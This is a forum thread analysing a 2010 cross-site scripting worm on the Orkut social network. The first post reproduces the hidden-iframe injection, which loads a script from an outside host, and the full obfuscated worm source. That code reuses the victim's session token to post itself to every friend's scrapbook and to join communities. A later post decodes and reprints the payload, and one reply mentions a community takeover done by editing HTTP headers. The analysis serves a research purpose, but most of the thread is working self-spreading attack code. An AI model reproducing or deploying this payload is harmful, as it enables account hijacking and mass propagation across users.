Results 1 to 7 of 7

Thread: New mass spreading worm in orkut Share/Save - My123World.Com!

  1. #1
    Security Researcher fb1h2s's Avatar
    Join Date
    Jul 2010
    Location
    India
    Posts
    616
    Blog Entries
    32

    New mass spreading worm in orkut

    Orkut new version is found to be affected by a mass spreading new worm.

    The worms static analysis says that its just a mass spreading worm which uses ur scrap book to spread and makes u join few communities.
    The worm writer bypassed the script restrictions on orkut by passing on the following tags to IFRAME


    ><iframe style=display:none onload="a = document.createElement( 'script');a.src = '/' + '/tptools.o'+'rg/worm.js'+'#<wbr>#'; document . body . appendChild( a )"></iframe>


    here the java script code which is hosted in tptools.com is called via onload function and excuted, and this happen when u login and reach ur orut home age
    as ur new scraps are updated in ur home page, or either by visitng your scrap book triggers the excution of the code.

    The worm is programmed to send copy of itself to all in ur friendlist via scrap and make u join few communities.

    And there would not be much harm as of now, and I dont think you need to change your passwod and all.



    var _0x37a1=["\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\ x4C\x48\x74\x74\x70","\x50\x4F\x53\x54\x5F\x54\x4F \x4B\x45\x4E\x3D","\x43\x47\x49\x2E\x50\x4F\x53\x5 4\x5F\x54\x4F\x4B\x45\x4E","\x26\x73\x69\x67\x6E\x 61\x74\x75\x72\x65\x3D","\x50\x61\x67\x65\x2E\x73\ x69\x67\x6E\x61\x74\x75\x72\x65\x2E\x72\x61\x77"," \x50\x4F\x53\x54","\x53\x63\x72\x61\x70\x62\x6F\x6 F\x6B\x3F","\x6F\x70\x65\x6E","\x43\x6F\x6E\x74\x6 5\x6E\x74\x2D\x54\x79\x70\x65","\x61\x70\x70\x6C\x 69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77 \x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x 6F\x64\x65\x64\x3B","\x73\x65\x74\x52\x65\x71\x75\ x65\x73\x74\x48\x65\x61\x64\x65\x72","\x26\x73\x63 \x72\x61\x70\x54\x65\x78\x74\x3D","\x3C\x73\x74\x7 9\x6C\x65\x2F\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\ x73\x74\x79\x6C\x65\x3D\x64\x69\x73\x70\x6C\x61\x7 9\x3A\x6E\x6F\x6E\x65\x20\x6F\x6E\x6C\x6F\x61\x64\ x3D\x22\x61\x20\x3D\x20\x64\x6F\x63\x75\x6D\x65\x6 E\x74\x2E\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\ x65\x6E\x74\x28\x20\x27\x73\x63\x72\x69\x70\x74\x2 7\x29\x3B\x61\x2E\x73\x72\x63\x20\x3D\x20\x27\x2F\ x27\x20\x2B\x20\x27\x2F\x74\x70\x74\x6F\x6F\x6C\x7 3\x2E\x6F\x27\x2B\x27\x72\x67\x2F\x77\x6F\x72\x6D\ x2E\x6A\x73\x27\x2B\x27\x23\x3C\x77\x62\x72\x3E\x2 3\x27\x3B\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x20\ x2E\x20\x62\x6F\x64\x79\x20\x2E\x20\x61\x70\x70\x6 5\x6E\x64\x43\x68\x69\x6C\x64\x28\x20\x61\x20\x29\ x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x42\x6 F\x6D\x20\x53\x61\x62\x61\x64\x6F\x21","\x26\x75\x 69\x64\x3D","\x26\x41\x63\x74\x69\x6F\x6E\x2E\x73\ x75\x62\x6D\x69\x74\x3D\x31","\x73\x65\x6E\x64","\ x47\x45\x54","\x52\x65\x71\x75\x65\x73\x74\x46\x72 \x69\x65\x6E\x64\x73\x3F\x72\x65\x71\x3D\x66\x6C\x 26\x75\x69\x64\x3D","\x75\x69\x64","\x26\x6F\x78\x 68\x3D\x31","\x77\x68\x69\x6C\x65\x20\x28\x74\x72\ x75\x65\x29\x3B\x20\x26\x26\x26\x53\x54\x41\x52\x5 4\x26\x26\x26","","\x72\x65\x70\x6C\x61\x63\x65"," \x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74", "\x43\x6F\x6D\x6D\x75\x6E\x69\x74\x79\x4A\x6F\x69\ x6E\x3F\x63\x6D\x6D\x3D","\x26\x41\x63\x74\x69\x6F \x6E\x2E\x6A\x6F\x69\x6E\x3D\x31","\x31\x30\x36\x3 6\x39\x38\x38\x30\x38","\x36","\x35\x35\x38\x34\x3 9\x34","\x31\x30\x36\x36\x39\x38\x36\x32\x38","\x3 1\x30\x36\x36\x39\x31\x33\x34\x31","\x76\x61\x72\x 20\x66\x72\x69\x65\x6E\x64\x73\x20\x3D\x20","\x3B" ,"\x6C\x69\x73\x74","\x64\x61\x74\x61","\x69\x6 4"];


    function createXMLHttpRequest()
    {
    try
    {
    return new XMLHttpRequest();
    }
    catch(e)
    {
    return new ActiveXObject(_0x37a1[0]);
    }
    ;
    }
    ;
    var data=_0x37a1[1]+encodeURIComponent(JSHDF[_0x37a1[2]])+_0x37a1[3]+encodeURIComponent(JSHDF[_0x37a1[4]]);
    function sendScrap(_0x7c2bx4)
    {
    var _0x7c2bx5=createXMLHttpRequest();
    _0x7c2bx5[_0x37a1[7]](_0x37a1[5],_0x37a1[6],false);
    _0x7c2bx5[_0x37a1[10]](_0x37a1[8],_0x37a1[9]);
    _0x7c2bx5[_0x37a1[15]](data+_0x37a1[11]+encodeURIComponent(_0x37a1[12])+_0x37a1[13]+_0x7c2bx4+_0x37a1[14]);
    } ;
    function requestFriends()
    {
    var _0x7c2bx5=createXMLHttpRequest();
    _0x7c2bx5[_0x37a1[7]](_0x37a1[16],_0x37a1[17]+JSHDF[_0x37a1[18]]+_0x37a1[19],false);
    _0x7c2bx5[_0x37a1[15]](null);
    return (_0x7c2bx5[_0x37a1[23]])[_0x37a1[22]](_0x37a1[20],_0x37a1[21]);
    } ;
    function joinCMM(_0x7c2bx8)
    {
    var _0x7c2bx5=createXMLHttpRequest();
    _0x7c2bx5[_0x37a1[7]](_0x37a1[5],_0x37a1[24]+_0x7c2bx8,false);
    _0x7c2bx5[_0x37a1[10]](_0x37a1[8],_0x37a1[9]);
    _0x7c2bx5[_0x37a1[15]](data+_0x37a1[25]);
    } ;
    joinCMM(_0x37a1[26]);
    joinCMM(_0x37a1[27]);
    joinCMM(_0x37a1[28]);
    joinCMM(_0x37a1[29]);
    joinCMM(_0x37a1[30]);
    eval(_0x37a1[31]+requestFriends()+_0x37a1[32]);
    for(x in friends[_0x37a1[34]][_0x37a1[33]])
    {
    uid=(friends[_0x37a1[34]][_0x37a1[33]][x]);
    sendScrap(uid[_0x37a1[35]]);} ;


    The analysis of the payload would be done soon and would be updated
    Last edited by fb1h2s; 09-25-2010 at 03:15 PM.
    Hacking Is a Matter of Time Knowledge and Patience

  2. #2
    orkut web developers need to work hard now :P
    hey bro is there any posibility for facebook too ??

  3. #3
    Security Researcher fb1h2s's Avatar
    Join Date
    Jul 2010
    Location
    India
    Posts
    616
    Blog Entries
    32
    The array named _0x37a1=[] is holding all the encodeed value and each array variable is called and put it into right place before execution. So its pretty easy to decode the value by reversing the data in the array. And the decoded value confirms wht the worm is doing

    Code:
    Microsoft.XMLHttpPOST_TOKEN=CGI.POST_TOKEN&signature=Page.signature.rawPOSTScrapbook?openContent-Typeapplication/x-www-form-urlencoded;
    setRequestHeader
    &scrapText=<style/><iframe style=display:none onload="a = document.createElement( 'script');a.src = '/' + '/tptools.o'+'rg/worm.js'+'#<wbr>#'; document . body . appendChild( a )"></iframe>Bom Sabado!
    &uid=&Action.submit=1send
    GETRequestFriends?req=fl&uid=uid&oxh=1while (true);
     &&&START&&&replaceresponseTextCommunityJoin?cmm=&Action.join=11066988086558494106698628106691341var friends = ;listdataid

    It creates XML rpc request and loads all friends form your friend list and send them a scrap with the text

    Code:
    <style/><iframe style=display:none onload="a = document.createElement( 'script');a.src = '/' + '/tptools.o'+'rg/worm.js'+'#<wbr>#'; document . body . appendChild( a )"></iframe>Bom Sabado!

    As this is the part which is used for the further infection of the worm.

    And it make you join few communities

    one is this 106698808 and a couple of others. The best part is this is not a harmful worm , as all what it does is spam and spread more
    Hacking Is a Matter of Time Knowledge and Patience

  4. #4
    Super Commando Dhruv abhaythehero's Avatar
    Join Date
    Sep 2010
    Location
    Lucknow/Pune,India
    Posts
    466
    Blog Entries
    2
    Had to use m.orkut.com for a while

    And nice analysis !
    In the world of 0s and 1s, are you a zero or The One !

  5. #5
    nice info..................
    JAI MATA DI

    *

    Silence is not our weakness, Its just we dont want to waste our time...........

  6. #6
    really nice & hard work bro
    JAI MATA DI

    *

    Silence is not our weakness, Its just we dont want to waste our time...........

  7. #7
    it was coded by a 16 year old brazlian.

    do you guys know about recent community flaw on orkut?brazilians gained ownership to many communities by editing http headers

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •